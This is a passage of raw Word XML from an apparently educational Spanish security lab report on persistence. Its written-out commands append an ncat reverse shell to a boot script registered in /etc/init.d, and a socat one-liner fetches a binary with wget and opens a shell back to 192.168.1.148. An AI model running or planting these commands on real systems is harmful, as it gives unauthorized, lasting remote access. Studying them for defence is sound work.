      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">  # Instalar Git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F8C9B3" w14:textId="77777777" w:rsidR="00E92C5E" w:rsidRPr="00857F50" w:rsidRDefault="00E92C5E" w:rsidP="00E92C5E">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">  sudo apt-get update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705EC558" w14:textId="20F4F5C5" w:rsidR="00E92C5E" w:rsidRPr="00857F50" w:rsidRDefault="00E92C5E" w:rsidP="00E92C5E">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">  sudo apt install ncat -y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691D4C08" w14:textId="7EC5C1C4" w:rsidR="00125DBA" w:rsidRPr="00857F50" w:rsidRDefault="00E92C5E" w:rsidP="00E92C5E">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2DB62C" w14:textId="77777777" w:rsidR="00125DBA" w:rsidRPr="00857F50" w:rsidRDefault="00125DBA" w:rsidP="004816EB">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>echo "ncat -nlvp 192.168.1.148 8888 -e /bin/bash –ssl" &gt;&gt; script.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F50EEF6" w14:textId="02EE74DE" w:rsidR="00125DBA" w:rsidRPr="00857F50" w:rsidRDefault="004816EB" w:rsidP="004816EB">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>Ahora</w:t>
      </w:r>
      <w:r w:rsidR="00E92C5E" w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>moveré el archivo a /etc/init.d y ahre que se ejecute al inciar el sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C82B58" w14:textId="7153E030" w:rsidR="004816EB" w:rsidRPr="00857F50" w:rsidRDefault="004816EB" w:rsidP="004816EB">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">mv script.sh /etc/init.d -&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:tab/>
        <w:t>Mara mover el fichero a /etc/init.d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CC7E62" w14:textId="2504EDAF" w:rsidR="004816EB" w:rsidRPr="00857F50" w:rsidRDefault="004816EB" w:rsidP="004816EB">
      <w:pPr>
        <w:ind w:left="1416"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">update-rc.d script.sh defaults -&gt; Para que se ejecute al </w:t>
      </w:r>
      <w:r w:rsidR="00DB4FC9" w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>iniciar</w:t>
      </w:r>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve"> el sistema</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8CB690" w14:textId="27449585" w:rsidR="004816EB" w:rsidRPr="004816EB" w:rsidRDefault="004816EB" w:rsidP="004816EB">
      <w:pPr>
        <w:ind w:left="1416"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D28D5AD" w14:textId="02129043" w:rsidR="004816EB" w:rsidRPr="004816EB" w:rsidRDefault="004816EB" w:rsidP="004816EB">
      <w:pPr>
        <w:ind w:left="1416"/>
      </w:pPr>
      <w:r w:rsidRPr="004816EB">
        <w:t>Y con esto consigo la Reverse Shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF90AAD" w14:textId="77777777" w:rsidR="002E06D4" w:rsidRDefault="002E06D4" w:rsidP="004601B3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:color w:val="24292F"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4720E552" w14:textId="1EA83358" w:rsidR="002A0D7B" w:rsidRPr="009C77E3" w:rsidRDefault="0086479E" w:rsidP="009C77E3">
      <w:pPr>
        <w:ind w:left="1410"/>
      </w:pPr>
      <w:r w:rsidRPr="009C77E3">
        <w:t xml:space="preserve">Se podría usar este programa </w:t>
      </w:r>
      <w:r w:rsidR="009C77E3">
        <w:t xml:space="preserve">Shellereator: </w:t>
      </w:r>
      <w:hyperlink r:id="rId303" w:history="1">
        <w:r w:rsidR="009C77E3" w:rsidRPr="00493072">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://github.com/ShutdownRepo/shellerator</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="009C77E3">
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD070FD" w14:textId="77777777" w:rsidR="002A0D7B" w:rsidRDefault="002A0D7B" w:rsidP="004601B3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:color w:val="24292F"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D1E32DB" w14:textId="237A8374" w:rsidR="002A0D7B" w:rsidRDefault="009C77E3" w:rsidP="009C77E3">
      <w:pPr>
        <w:ind w:left="1410"/>
      </w:pPr>
      <w:r w:rsidRPr="009C77E3">
        <w:t>Sirve para generar los comandos de una Shell con diferentes programas, ncat, socat</w:t>
      </w:r>
      <w:r>
        <w:t>, bash, openssl, Python, ruby…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B30E9F" w14:textId="60B1FC87" w:rsidR="009C77E3" w:rsidRDefault="009C77E3" w:rsidP="009C77E3">
      <w:pPr>
        <w:ind w:left="1410"/>
      </w:pPr>
      <w:r w:rsidRPr="009C77E3">
        <w:t xml:space="preserve">Para instalarlo tendremos que hacer un git clone del proyecto, después nos moveremos a la carpeta del proyecto y ejecutaremos python3 setup.py install </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="009C77E3">
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2731B484" w14:textId="0A7FBD88" w:rsidR="009C77E3" w:rsidRDefault="009C77E3" w:rsidP="009C77E3">
      <w:pPr>
        <w:ind w:left="1410"/>
      </w:pPr>
      <w:r>
        <w:t>Primero elegiremos la interfaz, en este caso eth0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C75D37" w14:textId="20B4AD00" w:rsidR="009C77E3" w:rsidRPr="009C77E3" w:rsidRDefault="009C77E3" w:rsidP="009C77E3">
      <w:pPr>
        <w:ind w:left="1410"/>
      </w:pPr>
      <w:r w:rsidRPr="009C77E3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E5DA93F" wp14:editId="7A32C454">
            <wp:extent cx="5259926" cy="362096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59926" cy="3620964"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E11C0EC" w14:textId="6196B184" w:rsidR="009C77E3" w:rsidRDefault="009C77E3" w:rsidP="009C77E3">
      <w:pPr>
        <w:ind w:left="1410"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D250E1C" w14:textId="2C9A7061" w:rsidR="009C77E3" w:rsidRDefault="009C77E3" w:rsidP="009C77E3">
      <w:pPr>
        <w:ind w:left="1410"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora el puerto en esta caso HTTP 80:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD5F5B5" w14:textId="410B23B1" w:rsidR="009C77E3" w:rsidRDefault="009C77E3" w:rsidP="009C77E3">
      <w:pPr>
        <w:ind w:left="1410"/>
      </w:pPr>
      <w:r w:rsidRPr="009C77E3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="304C0C9D" wp14:editId="71AAD06F">
            <wp:extent cx="5400040" cy="345376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3453765"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="63651065" w14:textId="3732DD64" w:rsidR="009C77E3" w:rsidRDefault="009C77E3" w:rsidP="009C77E3">
      <w:pPr>
        <w:ind w:left="1410"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="356411FB" w14:textId="4750C9BF" w:rsidR="009C77E3" w:rsidRDefault="009C77E3" w:rsidP="009C77E3">
      <w:pPr>
        <w:ind w:left="1410"/>
      </w:pPr>
      <w:r>
        <w:t>Y ahora elegiremos el programa con el cual crear la Shell, en esta caso socat:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01588A25" w14:textId="3CB8542E" w:rsidR="009C77E3" w:rsidRDefault="009C77E3" w:rsidP="009C77E3">
      <w:pPr>
        <w:ind w:left="1410"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06823F09" w14:textId="5ED72F9D" w:rsidR="009C77E3" w:rsidRDefault="009C77E3" w:rsidP="009C77E3">
      <w:pPr>
        <w:ind w:left="1410"/>
      </w:pPr>
      <w:r w:rsidRPr="009C77E3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="004A8E07" wp14:editId="49298B86">
            <wp:extent cx="5400040" cy="3955415"/>
            <wp:effectExtent l="0" t="0" r="0" b="698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3955415"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F01B36" w14:textId="77777777" w:rsidR="009C77E3" w:rsidRDefault="009C77E3" w:rsidP="009C77E3">
      <w:pPr>
        <w:ind w:left="1410"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21192670" w14:textId="5579DFA2" w:rsidR="009C77E3" w:rsidRDefault="009C77E3" w:rsidP="009C77E3">
      <w:pPr>
        <w:ind w:left="1410"/>
      </w:pPr>
      <w:r>
        <w:t>Y nos generará los comandos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F853C7E" w14:textId="4BE79749" w:rsidR="009C77E3" w:rsidRDefault="000D34A5" w:rsidP="009C77E3">
      <w:pPr>
        <w:ind w:left="1410"/>
      </w:pPr>
      <w:r w:rsidRPr="000D34A5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EA399D3" wp14:editId="6834C421">
            <wp:extent cx="5400040" cy="376110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00040" cy="3761105"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6898913D" w14:textId="4008BC4F" w:rsidR="009C77E3" w:rsidRDefault="009C77E3" w:rsidP="009C77E3">
      <w:pPr>
        <w:ind w:left="1410"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A2CF2CD" w14:textId="118962A7" w:rsidR="009C77E3" w:rsidRDefault="009C77E3" w:rsidP="009C77E3">
      <w:pPr>
        <w:ind w:left="1410"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>En este caso si gua</w:t>
      </w:r>
      <w:r w:rsidR="00D911EB">
        <w:t>rdamos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> en el script, para obtener la persistencia este comando ‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.1.148:80’</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FB1C3C" w14:textId="3AEEC9AD" w:rsidR="009C77E3" w:rsidRDefault="009C77E3" w:rsidP="009C77E3">
      <w:pPr>
        <w:ind w:left="1410"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Y en la </w:t>
      </w:r>
      <w:r w:rsidR="00D911EB">
        <w:t>máquina</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> atacante este otro </w:t>
      </w:r>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>‘ socat file:`tty`,raw,echo=0 TCP-L:80’</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F67F960" w14:textId="74564BA8" w:rsidR="009C77E3" w:rsidRPr="009C77E3" w:rsidRDefault="009C77E3" w:rsidP="009C77E3">
      <w:pPr>
        <w:ind w:left="1410"/>
      </w:pPr>
      <w:r>
        <w:t>Tendríamos la Shell también.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777AFE4F" w14:textId="77777777" w:rsidR="002A0D7B" w:rsidRDefault="002A0D7B" w:rsidP="004601B3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:color w:val="24292F"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42D9D29D" w14:textId="77777777" w:rsidR="002A0D7B" w:rsidRDefault="002A0D7B" w:rsidP="004601B3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:color w:val="24292F"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56B29C32" w14:textId="77777777" w:rsidR="002A0D7B" w:rsidRDefault="002A0D7B" w:rsidP="004601B3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:color w:val="24292F"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DCC4F59" w14:textId="0924FBFC" w:rsidR="004601B3" w:rsidRDefault="002E06D4" w:rsidP="004601B3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:color w:val="24292F"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:color w:val="24292F"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00A854B2">
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:color w:val="24292F"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE3995C" w14:textId="387F3BB5" w:rsidR="00F00B53" w:rsidRDefault="00F00B53" w:rsidP="004601B3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:color w:val="24292F"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04226E24" w14:textId="15E73594" w:rsidR="00F00B53" w:rsidRDefault="00F00B53" w:rsidP="004601B3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:color w:val="24292F"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61FF1C18" w14:textId="2591A630" w:rsidR="00F00B53" w:rsidRDefault="00F00B53" w:rsidP="004601B3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:color w:val="24292F"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FA1390E" w14:textId="2169BACD" w:rsidR="00F00B53" w:rsidRDefault="00F00B53" w:rsidP="004601B3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:color w:val="24292F"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="703001FE" w14:textId="6AE4F45E" w:rsidR="00F00B53" w:rsidRDefault="00F00B53" w:rsidP="004601B3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:color w:val="24292F"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C7FB4E1" w14:textId="7A3D0448" w:rsidR="00F00B53" w:rsidRDefault="00F00B53" w:rsidP="004601B3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:color w:val="24292F"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11DA2868" w14:textId="7C315BEA" w:rsidR="00F00B53" w:rsidRDefault="00F00B53" w:rsidP="004601B3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:color w:val="24292F"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CA01CD8" w14:textId="0B1CC777" w:rsidR="00F00B53" w:rsidRDefault="00F00B53" w:rsidP="004601B3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:color w:val="24292F"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A1CD953" w14:textId="5FAD4557" w:rsidR="00F00B53" w:rsidRDefault="00F00B53" w:rsidP="004601B3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:color w:val="24292F"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="154A1125" w14:textId="48BA0F7C" w:rsidR="00F00B53" w:rsidRDefault="00F00B53" w:rsidP="004601B3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:color w:val="24292F"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24F0F418" w14:textId="32E41E4F" w:rsidR="00F00B53" w:rsidRDefault="00F00B53" w:rsidP="004601B3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:color w:val="24292F"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="746B7CAF" w14:textId="43CBC636" w:rsidR="00F00B53" w:rsidRDefault="00F00B53" w:rsidP="004601B3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:color w:val="24292F"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B7FE6F2" w14:textId="198414FB" w:rsidR="00F00B53" w:rsidRDefault="00F00B53" w:rsidP="004601B3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:color w:val="24292F"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B25A4C4" w14:textId="52726671" w:rsidR="00F00B53" w:rsidRDefault="00F00B53" w:rsidP="004601B3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:color w:val="24292F"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09D0D5C5" w14:textId="4B96DB03" w:rsidR="00F00B53" w:rsidRDefault="00F00B53" w:rsidP="004601B3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:color w:val="24292F"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="755CDC4D" w14:textId="2A79E822" w:rsidR="00F00B53" w:rsidRDefault="00F00B53" w:rsidP="004601B3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:color w:val="24292F"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21CB3CE4" w14:textId="7DB9EDDA" w:rsidR="00F00B53" w:rsidRDefault="00F00B53" w:rsidP="004601B3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:color w:val="24292F"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60E6D0FC" w14:textId="448BCD8C" w:rsidR="00F00B53" w:rsidRDefault="00F00B53" w:rsidP="004601B3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:color w:val="24292F"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4259562A" w14:textId="49D7FF29" w:rsidR="00F00B53" w:rsidRDefault="00F00B53" w:rsidP="004601B3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:color w:val="24292F"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E649345" w14:textId="7605D639" w:rsidR="00F00B53" w:rsidRDefault="00F00B53" w:rsidP="004601B3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CdigoHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas"/>
          <w:color w:val="24292F"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58F841A4" w14:textId="77777777" w:rsidR="00F00B53" w:rsidRPr="00810052" w:rsidRDefault="00F00B53" w:rsidP="004601B3"/>
    <w:p w14:paraId="3581E8FE" w14:textId="31879461" w:rsidR="004601B3" w:rsidRDefault="004601B3" w:rsidP="004601B3">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="66" w:name="_Toc128034177"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Defensa</w:t>
      </w:r>
